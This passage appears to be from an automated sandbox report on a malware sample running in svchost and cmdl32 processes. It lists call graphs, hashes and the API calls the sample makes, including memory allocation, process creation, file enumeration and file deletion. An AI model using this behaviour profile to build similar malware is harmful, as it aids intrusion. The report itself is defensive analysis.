                                                                                        • Opcode ID: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
                                                                                        • Instruction ID: 0c82d0d49e48d688fc46f782253f15b9a9d859c4dd4245f2ce52013bc282fc4c
                                                                                        • Opcode Fuzzy Hash: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
                                                                                        • Instruction Fuzzy Hash: 3F811976D002699BDB31DF94CC44BEEB6B8AB08710F0445EAE919F7680D7709E84CFA1
                                                                                        Function 038BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 038BCFBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8
                                                                                        • String ID: @$@4Cw@4Cw
                                                                                        • API String ID: 4062629308-3101775584
                                                                                        • Opcode ID: c76abe0edd995484c0adaef074e5e38cfe5912e2e42bcf231c80b51c0aa5d778
                                                                                        • Instruction ID: d0707ef9548473c4af721de229b394c11a171557e9a77429c2b597ceb28b5320
                                                                                        • Opcode Fuzzy Hash: c76abe0edd995484c0adaef074e5e38cfe5912e2e42bcf231c80b51c0aa5d778
                                                                                        • Instruction Fuzzy Hash: 40418C79900729EFCB21EFE9D880AADBBB8EF45B04F0440AAE914DB354D774D805CB61

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.9%
                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                        Signature Coverage:2.3%
                                                                                        Total number of Nodes:440
                                                                                        Total number of Limit Nodes:70
                                                                                        execution_graph 85561 4902ad0 LdrInitializeThunk 85562 270b170 85565 272ae40 85562->85565 85564 270c7e1 85568 2728fa0 85565->85568 85567 272ae6d 85567->85564 85569 2728fcb 85568->85569 85570 2729035 85568->85570 85569->85567 85571 272904b NtAllocateVirtualMemory 85570->85571 85571->85567 85572 2709bf0 85575 2709e41 85572->85575 85573 270a0d6 85575->85573 85576 272ab40 85575->85576 85577 272ab66 85576->85577 85582 2704160 85577->85582 85579 272ab72 85580 272abab 85579->85580 85585 27250b0 85579->85585 85580->85573 85589 2712e20 85582->85589 85584 270416d 85584->85579 85586 2725112 85585->85586 85588 272511f 85586->85588 85613 27115f0 85586->85613 85588->85580 85590 2712e39 85589->85590 85592 2712e52 85590->85592 85593 2729870 85590->85593 85592->85584 85595 272988a 85593->85595 85594 27298b9 85594->85592 85595->85594 85600 2728470 85595->85600 85601 272848a 85600->85601 85607 4902c0a 85601->85607 85602 27284b6 85604 272aec0 85602->85604 85610 27291a0 85604->85610 85606 2729927 85606->85592 85608 4902c1f LdrInitializeThunk 85607->85608 85609 4902c11 85607->85609 85608->85602 85609->85602 85611 27291bd 85610->85611 85612 27291ce RtlFreeHeap 85611->85612 85612->85606 85614 271162b 85613->85614 85629 2717a50 85614->85629 85616 2711633 85627 2711903 85616->85627 85640 272afa0 85616->85640 85618 2711649 85619 272afa0 RtlAllocateHeap 85618->85619 85620 2711657 85619->85620 85621 272afa0 RtlAllocateHeap 85620->85621 85622 2711668 85621->85622 85628 27116f9 85622->85628 85651 2716610 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 85622->85651 85625 27118b2 85647 27279f0 85625->85647 85627->85588 85643 2714160 85628->85643 85630 2717a7c 85629->85630 85652 2717940 85630->85652 85633 2717ac1 85635 2717add 85633->85635 85638 2728e40 NtClose 85633->85638 85634 2717aa9 85636 2717ab4 85634->85636 85658 2728e40 85634->85658 85635->85616 85636->85616 85639 2717ad3 85638->85639 85639->85616 85666 2729150 85640->85666 85642 272afbb 85642->85618 85644 2714184 85643->85644 85645 27141c0 LdrLoadDll 85644->85645 85646 271418b 85644->85646 85645->85646 85646->85625 85648 2727a52 85647->85648 85650 2727a5f 85648->85650 85669 2711920 85648->85669 85650->85627 85651->85628 85653 271795a 85652->85653 85657 2717a36 85652->85657 85661 2728510 85653->85661 85656 2728e40 NtClose 85656->85657 85657->85633 85657->85634 85659 2728e5a 85658->85659 85660 2728e6b NtClose 85659->85660 85660->85636 85662 272852a 85661->85662 85665 49035c0 LdrInitializeThunk 85662->85665 85663 2717a2a 85663->85656 85665->85663 85667 272916d 85666->85667 85668 272917e RtlAllocateHeap 85667->85668 85668->85642 85685 2717d20 85669->85685 85671 2711940 85680 2711e93 85671->85680 85689 2720be0 85671->85689 85674 2711b4e 85697 272c1b0 85674->85697 85675 271199e 85675->85680 85692 272c080 85675->85692 85677 2711bad 85677->85680 85682 2710430 LdrInitializeThunk 85677->85682 85707 2717cc0 85677->85707 85678 2711b63 85678->85677 85703 2710430 85678->85703 85680->85650 85682->85677 85683 2711d00 85683->85677 85684 2717cc0 LdrInitializeThunk 85683->85684 85684->85683 85686 2717d2d 85685->85686 85687 2717d55 85686->85687 85688 2717d4e SetErrorMode 85686->85688 85687->85671 85688->85687 85690 272ae40 NtAllocateVirtualMemory 85689->85690 85691 2720c01 85690->85691 85691->85675 85693 272c090 85692->85693 85694 272c096 85692->85694 85693->85674 85695 272afa0 RtlAllocateHeap 85694->85695 85696 272c0bc 85695->85696 85696->85674 85698 272c120 85697->85698 85699 272c17d 85698->85699 85700 272afa0 RtlAllocateHeap 85698->85700 85699->85678 85701 272c15a 85700->85701 85702 272aec0 RtlFreeHeap 85701->85702 85702->85699 85704 2710448 85703->85704 85711 27290c0 85704->85711 85708 2717cd3 85707->85708 85716 2728370 85708->85716 85710 2717cfe 85710->85677 85712 27290da 85711->85712 85715 4902c70 LdrInitializeThunk 85712->85715 85713 271044e 85713->85683 85715->85713 85717 27283f1 85716->85717 85718 272839e 85716->85718 85721 4902dd0 LdrInitializeThunk 85717->85721 85718->85710 85719 2728416 85719->85710 85721->85719 85722 27183b1 85723 27183bb 85722->85723 85725 27183a1 85723->85725 85726 2716b80 LdrInitializeThunk LdrInitializeThunk 85723->85726 85726->85725 85727 2716970 85728 2716997 85727->85728 85731 2717af0 85728->85731 85730 27169bd 85732 2717b0d 85731->85732 85738 2728560 85732->85738 85734 2717b5d 85735 2717b64 85734->85735 85743 2728640 85734->85743 85735->85730 85737 2717b8d 85737->85730 85739 27285fb 85738->85739 85740 272858b 85738->85740 85748 4902f30 LdrInitializeThunk 85739->85748 85740->85734 85741 2728634 85741->85734 85744 27286f4 85743->85744 85745 2728672 85743->85745 85749 4902d10 LdrInitializeThunk 85744->85749 85745->85737 85746 2728739 85746->85737 85748->85741 85749->85746 85750 271fbf0 85751 271fc0d 85750->85751 85752 2714160 LdrLoadDll 85751->85752 85753 271fc2b 85752->85753 85754 2728b30 85755 2728be7 85754->85755 85757 2728b5f 85754->85757 85756 2728bfd NtCreateFile 85755->85756 85758 271f360 85759 271f3c4 85758->85759 85787 2715ec0 85759->85787 85761 271f4fe 85762 271f4f7 85762->85761 85794 2715fd0 85762->85794 85764 271f57a 85765 271f6b2 85764->85765 85784 271f6a3 85764->85784 85798 271f140 85764->85798 85766 2728e40 NtClose 85765->85766 85768 271f6bc 85766->85768 85769 271f5b6 85769->85765 85770 271f5c1 85769->85770 85771 272afa0 RtlAllocateHeap 85770->85771 85772 271f5ea 85771->85772 85773 271f5f3 85772->85773 85774 271f609 85772->85774 85776 2728e40 NtClose 85773->85776 85807 271f030 CoInitialize 85774->85807 85777 271f5fd 85776->85777 85778 271f617 85810 27288f0 85778->85810 85780 271f692 85781 2728e40 NtClose 85780->85781 85782 271f69c 85781->85782 85783 272aec0 RtlFreeHeap 85782->85783 85783->85784 85785 271f635 85785->85780 85786 27288f0 LdrInitializeThunk 85785->85786 85786->85785 85788 2715ef3 85787->85788 85789 2715f13 85788->85789 85814 2728990 85788->85814 85789->85762 85791 2715f36 85791->85789 85792 2728e40 NtClose 85791->85792 85793 2715fb6 85792->85793 85793->85762 85795 2715ff5 85794->85795 85819 2728780 85795->85819 85799 271f15c 85798->85799 85800 2714160 LdrLoadDll 85799->85800 85802 271f17a 85800->85802 85801 271f183 85801->85769 85802->85801 85803 2714160 LdrLoadDll 85802->85803 85804 271f24e 85803->85804 85805 2714160 LdrLoadDll 85804->85805 85806 271f2a8 85804->85806 85805->85806 85806->85769 85809 271f095 85807->85809 85808 271f12b CoUninitialize 85808->85778 85809->85808 85811 272890a 85810->85811 85824 4902ba0 LdrInitializeThunk 85811->85824 85812 272893a 85812->85785 85815 27289aa 85814->85815 85818 4902ca0 LdrInitializeThunk 85815->85818 85816 27289d6 85816->85791 85818->85816 85820 272879a 85819->85820 85823 4902c60 LdrInitializeThunk 85820->85823 85821 2716069 85821->85764 85823->85821 85824->85812 85825 271c1a0 85827 271c1c9 85825->85827 85826 271c2cd 85827->85826 85828 271c273 FindFirstFileW 85827->85828 85828->85826 85830 271c28e 85828->85830 85829 271c2b4 FindNextFileW 85829->85830 85831 271c2c6 FindClose 85829->85831 85830->85829 85831->85826 85832 2728420 85833 272843a 85832->85833 85836 4902df0 LdrInitializeThunk 85833->85836 85834 2728462 85836->85834 85837 272c0e0 85838 272aec0 RtlFreeHeap 85837->85838 85839 272c0f5 85838->85839 85840 27282a0 85841 2728332 85840->85841 85842 27282ce 85840->85842 85845 4902ee0 LdrInitializeThunk 85841->85845 85843 2728363 85845->85843 85846 2728ca0 85847 2728cce 85846->85847 85848 2728d4a 85846->85848 85849 2728d60 NtReadFile 85848->85849 85850 2728da0 85851 2728dcb 85850->85851 85852 2728e17 85850->85852 85853 2728e2d NtDeleteFile 85852->85853 85854 2725b20 85855 2725b7a 85854->85855 85857 2725b87 85855->85857 85858 2723530 85855->85858 85859 272ae40 NtAllocateVirtualMemory 85858->85859 85861 2723571 85859->85861 85860 272366e 85860->85857 85861->85860 85862 2714160 LdrLoadDll 85861->85862 85864 27235ae 85862->85864 85863 27235f0 Sleep 85863->85864 85864->85860 85864->85863 85865 2712d23 85866 2717940 2 API calls 85865->85866 85868 2712d33 85866->85868 85867 2712d4f 85868->85867 85869 2728e40 NtClose 85868->85869 85869->85867 85870 27215a0 85871 27215b9 85870->85871 85872 2721649 85871->85872 85873 2721601 85871->85873 85876 2721644 85871->85876 85874 272aec0 RtlFreeHeap 85873->85874 85875 2721611 85874->85875 85877 272aec0 RtlFreeHeap 85876->85877 85877->85872 85878 2711f2c 85879 2711f33 85878->85879 85880 2711ec6 85878->85880 85881 2728470 LdrInitializeThunk 85880->85881 85882 2711ee6 85881->85882 85885 2728ed0 85882->85885 85884 2711efb 85886 2728f62 85885->85886 85887 2728efe 85885->85887 85890 4902e80 LdrInitializeThunk 85886->85890 85887->85884 85888 2728f93 85888->85884 85890->85888 85892 2709b90 85893 2709b9f 85892->85893 85894 2709be0 85893->85894 85895 2709bcd CreateThread 85893->85895 85896 2716f10 85897 2716f82 85896->85897 85898 2716f28 85896->85898 85898->85897 85900 271ae20 85898->85900 85901 271ae46 85900->85901 85902 271b070 85901->85902 85927 2729230 85901->85927 85902->85897 85904 271aec2 85904->85902 85905 272c1b0 2 API calls 85904->85905 85906 271aede 85905->85906 85906->85902 85907 271afaf 85906->85907 85908 2728470 LdrInitializeThunk 85906->85908 85909 2715740 LdrInitializeThunk 85907->85909 85911 271afcb 85907->85911 85910 271af40 85908->85910 85909->85911 85910->85907 85914 271af49 85910->85914 85916 271b058 85911->85916 85933 2727fe0 85911->85933 85912 271af97 85913 2717cc0 LdrInitializeThunk 85912->85913 85917 271afa5 85913->85917 85914->85902 85914->85912 85915 271af78 85914->85915 85930 2715740 85914->85930 85948 2724230 LdrInitializeThunk 85915->85948 85918 2717cc0 LdrInitializeThunk 85916->85918 85917->85897 85922 271b066 85918->85922 85922->85897 85923 271b02f 85938 2728090 85923->85938 85925 271b049 85943 27281f0 85925->85943 85928 272924a 85927->85928 85929 2729258 CreateProcessInternalW 85928->85929 85929->85904 85931 2728640 LdrInitializeThunk 85930->85931 85932 271577e 85931->85932 85932->85915 85934 272805d 85933->85934 85935 272800b 85933->85935 85949 49039b0 LdrInitializeThunk 85934->85949 85935->85923 85936 2728082 85936->85923 85939 2728110 85938->85939 85940 27280be 85938->85940 85950 4904340 LdrInitializeThunk 85939->85950 85940->85925 85941 2728135 85941->85925 85944 2728270 85943->85944 85945 272821e 85943->85945 85951 4902fb0 LdrInitializeThunk 85944->85951 85945->85916 85946 2728295 85946->85916 85948->85912 85949->85936 85950->85941 85951->85946 85952 2721210 85953 272122c 85952->85953 85954 2721254 85953->85954 85955 2721268 85953->85955 85956 2728e40 NtClose 85954->85956 85957 2728e40 NtClose 85955->85957 85958 272125d 85956->85958 85959 2721271 85957->85959 85962 272afe0 RtlAllocateHeap 85959->85962 85961 272127c 85962->85961 85965 2716d40 85966 2716d5c 85965->85966 85970 2716da6 85965->85970 85967 2728e40 NtClose 85966->85967 85966->85970 85969 2716d74 85967->85969 85968 2716ed8 85975 2716150 NtClose LdrInitializeThunk LdrInitializeThunk 85969->85975 85970->85968 85976 2716150 NtClose LdrInitializeThunk LdrInitializeThunk 85970->85976 85972 2716eb2 85972->85968 85977 2716320 NtClose LdrInitializeThunk LdrInitializeThunk 85972->85977 85975->85970 85976->85972 85977->85968 85978 271a900 85983 271a610 85978->85983 85980 271a90d 85999 271a280 85980->85999 85982 271a929 85984 271a635 85983->85984 86011 2717f30 85984->86011 85987 271a780 85987->85980 85989 271a797 85989->85980 85991 271a78e 85991->85989 85994 271a885 85991->85994 86030 2724900 85991->86030 86035 2719cd0 85991->86035 85993 2724900 GetFileAttributesW 85993->85994 85994->85993 85996 271a8ea 85994->85996 86044 271a040 85994->86044 85997 272aec0 RtlFreeHeap 85996->85997 85998 271a8f1 85997->85998 85998->85980 86000 271a296 85999->86000 86003 271a2a1 85999->86003 86001 272afa0 RtlAllocateHeap 86000->86001 86001->86003 86002 271a2c8 86002->85982 86003->86002 86004 2717f30 GetFileAttributesW 86003->86004 86005 271a5e5 86003->86005 86008 2724900 GetFileAttributesW 86003->86008 86009 2719cd0 RtlFreeHeap 86003->86009 86010 271a040 RtlFreeHeap 86003->86010 86004->86003 86006 271a5fe 86005->86006 86007 272aec0 RtlFreeHeap 86005->86007 86006->85982 86007->86006 86008->86003 86009->86003 86010->86003 86012 2717f46 86011->86012 86013 2717f58 GetFileAttributesW 86012->86013 86014 2717f63 86012->86014 86013->86014 86014->85987 86015 2722e30 86014->86015 86016 2722e3e 86015->86016 86017 2722e45 86015->86017 86016->85991 86018 2714160 LdrLoadDll 86017->86018 86019 2722e7a 86018->86019 86020 2722e89 86019->86020 86048 2722900 LdrLoadDll 86019->86048 86022 272afa0 RtlAllocateHeap 86020->86022 86026 2723034 86020->86026 86023 2722ea2 86022->86023 86024 272302a 86023->86024 86023->86026 86027 2722ebe 86023->86027 86025 272aec0 RtlFreeHeap 86024->86025 86024->86026 86025->86026 86026->85991 86027->86026 86028 272aec0 RtlFreeHeap 86027->86028 86029 272301e 86028->86029 86029->85991 86031 2724965 86030->86031 86032 272499c 86031->86032 86049 2717f80 86031->86049 86032->85991 86034 272497e 86034->85991 86036 2719cf6 86035->86036 86053 271d6f0 86036->86053 86038 2719d68 86040 2719eea 86038->86040 86041 2719d86 86038->86041 86039 2719ecf 86039->85991 86040->86039 86043 2719b90 RtlFreeHeap 86040->86043 86041->86039 86058 2719b90 86041->86058 86043->86040 86045 271a066 86044->86045 86046 271d6f0 RtlFreeHeap 86045->86046 86047 271a0ed 86046->86047 86047->85994 86048->86020 86050 2717f46 86049->86050 86051 2717f58 GetFileAttributesW 86050->86051 86052 2717f63 86050->86052 86051->86052 86052->86034 86055 271d702 86053->86055 86054 271d721 86054->86038 86055->86054 86056 272aec0 RtlFreeHeap 86055->86056 86057 271d75e 86056->86057 86057->86038 86059 2719bad 86058->86059 86062 271d770 86059->86062 86061 2719cb3 86061->86041 86063 271d794 86062->86063 86064 271d83e 86063->86064 86065 272aec0 RtlFreeHeap 86063->86065 86064->86061 86065->86064 86066 27157c0 86067 2717cc0 LdrInitializeThunk 86066->86067 86069 27157f0 86067->86069 86070 271581c 86069->86070 86071 2717c40 86069->86071 86072 2717c84 86071->86072 86077 2717ca5 86072->86077 86078 2728140 86072->86078 86074 2717cb1 86074->86069 86075 2717c95 86075->86074 86076 2728e40 NtClose 86075->86076 86076->86077 86077->86069 86079 27281bd 86078->86079 86081 272816b 86078->86081 86083 4904650 LdrInitializeThunk 86079->86083 86080 27281e2 86080->86075 86081->86075 86083->86080 86099 2712388 86100 27123a8 86099->86100 86101 2715ec0 2 API calls 86100->86101 86102 27123b3 86101->86102 86103 2710a0b PostThreadMessageW 86104 2710a1d 86103->86104 86105 27197cf 86106 27197df 86105->86106 86107 272aec0 RtlFreeHeap 86106->86107 86108 27197e6 86106->86108 86107->86108

                                                                                        Executed Functions

                                                                                        Function 02709BF0 Relevance: 26.5, Strings: 21, Instructions: 298COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 27 2709bf0-2709e3f 28 2709e4a-2709e50 27->28 29 2709e62-2709e77 28->29 30 2709e52-2709e58 28->30 33 2709e82-2709e88 29->33 31 2709e60 30->31 32 2709e5a-2709e5d 30->32 31->28 32->31 35 2709e8a-2709e9c 33->35 36 2709e9e 33->36 35->33 37 2709ea2-2709ea8 36->37 39 270a09c-270a0a3 37->39 40 2709eae-2709eb5 37->40 41 270a0a5-270a0a9 39->41 42 270a0d6-270a0dd 39->42 43 2709ec0-2709ec6 40->43 44 270a0d1 call 272ab40 41->44 45 270a0ab-270a0cf 41->45 46 270a10a-270a114 42->46 47 270a0df-270a108 42->47 48 2709ed7-2709ee7 43->48 49 2709ec8-2709ed5 43->49 44->42 45->41 47->42 51 2709ef2-2709ef8 48->51 49->43 53 2709efa-2709f0c 51->53 54 2709f0e-2709f1a 51->54 53->51 55 2709f98-2709fa2 54->55 56 2709f1c-2709f20 54->56 60 2709fa4-2709fbf 55->60 61 2709fdb-2709fe1 55->61 58 2709f22-2709f46 56->58 59 2709f48-2709f4f 56->59 58->56 63 2709f51-2709f67 59->63 64 2709f74-2709f7d 59->64 65 2709fc1-2709fc5 60->65 66 2709fc6-2709fc8 60->66 62 2709fe5-2709fe9 61->62 67 2709feb-2709ffd 62->67 68 270a01c-270a023 62->68 69 2709f72 63->69 70 2709f69-2709f6f 63->70 71 2709f93 64->71 72 2709f7f-2709f91 64->72 65->66 73 2709fd9 66->73 74 2709fca-2709fd3 66->74 75 270a004-270a01a 67->75 76 2709fff-270a003 67->76 77 270a02e-270a037 68->77 69->59 70->69 71->39 72->64 73->55 74->73 75->62 76->75 78 270a044-270a04b 77->78 79 270a039-270a042 77->79 81 270a056-270a05f 78->81 79->77 82 270a061-270a06d 81->82 83 270a06f-270a076 81->83 82->81 85 270a081-270a087 83->85 86 270a097 85->86 87 270a089-270a095 85->87 86->37 87->85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$'$*2$+!$+@$/<$8$;$?$B$Cb$DV$I$M'$O$`"$a#$eh$o7$xF$}
                                                                                        • API String ID: 0-3343627249
                                                                                        • Opcode ID: 154d989f762a1fde0e1558b32f55564310e4cf5a18a05437f539feca77e0f6a6
                                                                                        • Instruction ID: d2695e631d911612e468c4b7d3c5d4974d89dff9acfe003afed4ca6df11eb8eb
                                                                                        • Opcode Fuzzy Hash: 154d989f762a1fde0e1558b32f55564310e4cf5a18a05437f539feca77e0f6a6
                                                                                        • Instruction Fuzzy Hash: 97E1B4B0D05258CBEB24CF85C998BDDBBB2BF44308F108199D20A7B385D7B95A89CF55
                                                                                        Function 0271C1A0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0271C284
                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0271C2BF
                                                                                        • FindClose.KERNELBASE(?), ref: 0271C2CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: d62c77a763d0dd3a0b99af2df67761c8a21f41accff8b72375e27316c38466b5
                                                                                        • Instruction ID: 6553d95c720014bcc876fabbac5f3dcb6892071550336fd2600b8fdc84f5d642
                                                                                        • Opcode Fuzzy Hash: d62c77a763d0dd3a0b99af2df67761c8a21f41accff8b72375e27316c38466b5
                                                                                        • Instruction Fuzzy Hash: CE317372940308ABDB25DFA4CC89FFF77BCAF44B48F14445DF508A6190DA70AA848FA5
                                                                                        Function 02728B30 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02728C2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 5efa377fa8e998bf9b0909703a42f8660daa4dc989758ee5f507b796ead848dd
                                                                                        • Instruction ID: 7827999bb503ddfa54d0e1d901f1688ef40fbb5cf3c0ee7995a156e5f7cbe574
                                                                                        • Opcode Fuzzy Hash: 5efa377fa8e998bf9b0909703a42f8660daa4dc989758ee5f507b796ead848dd
                                                                                        • Instruction Fuzzy Hash: 1D31C2B5A01648AFDB14DF98D881EEFB7F9AF8C314F508119F909A7240D730A955CFA4
                                                                                        Function 049035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: db38f67fbdf322ebba04da6c488d31a65cae5a3fc2cdc8fc6db508bd593f6aa0
                                                                                        • Instruction ID: a83d41ff0ebd33bf658dd72d9e958ce5d0e84c6c229227a6e98935e492ad5fe1
                                                                                        • Opcode Fuzzy Hash: db38f67fbdf322ebba04da6c488d31a65cae5a3fc2cdc8fc6db508bd593f6aa0
                                                                                        • Instruction Fuzzy Hash: 6590023164560803F100B158451870620498BD1205F65C422A0525569D8795DA5175A2
                                                                                        Function 04904650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1b9fb759b87d03b31bc087a00c71e213b60269ffa73e588802c1ad82c3bd52fc
                                                                                        • Instruction ID: 9f409d3152b5bbceb156351fee66bf13f2e537023d4f7eccddb0700797f76ae9
                                                                                        • Opcode Fuzzy Hash: 1b9fb759b87d03b31bc087a00c71e213b60269ffa73e588802c1ad82c3bd52fc
                                                                                        • Instruction Fuzzy Hash: 96900261641604436140B158480840670499BE2305395C126A0655561C8718D955A269
                                                                                        Function 04904340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ad885fa03229aafe332d007f230e5abf1a27fc929e3c9c4fd41bc7cf0ce9a9e5
                                                                                        • Instruction ID: a8e9353964e7cb361a74b55d25a643868b092fc2f4a384bffc9cb4df7320f14b
                                                                                        • Opcode Fuzzy Hash: ad885fa03229aafe332d007f230e5abf1a27fc929e3c9c4fd41bc7cf0ce9a9e5
                                                                                        • Instruction Fuzzy Hash: 2690023164590413B140B158488854650499BE1305B55C022E0525555C8B14DA566361
                                                                                        Function 04902CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7d72e291f004a38a097918f3aa0f8695512705a96aa92d60b3a5dec0654902d3
                                                                                        • Instruction ID: 4a39f9189bd1cd0699124611cbc2153f21f9b9463cbbd80cb6d2929de3566b09
                                                                                        • Opcode Fuzzy Hash: 7d72e291f004a38a097918f3aa0f8695512705a96aa92d60b3a5dec0654902d3
                                                                                        • Instruction Fuzzy Hash: B390023124150803F100B598540C64610498BE1305F55D022A5125556EC765D9917131
                                                                                        Function 04902C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e0fa32663f95a041869fd077c57045438bbce8528250ebe3d135ef2a7e7d99ad
                                                                                        • Instruction ID: f1f21a487aa0867b466ff18f2d994fd88445a33943c088eff438a345009db96c
                                                                                        • Opcode Fuzzy Hash: e0fa32663f95a041869fd077c57045438bbce8528250ebe3d135ef2a7e7d99ad
                                                                                        • Instruction Fuzzy Hash: 0290023124158C03F110B158840874A10498BD1305F59C422A4525659D8795D9917121
                                                                                        Function 04902C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
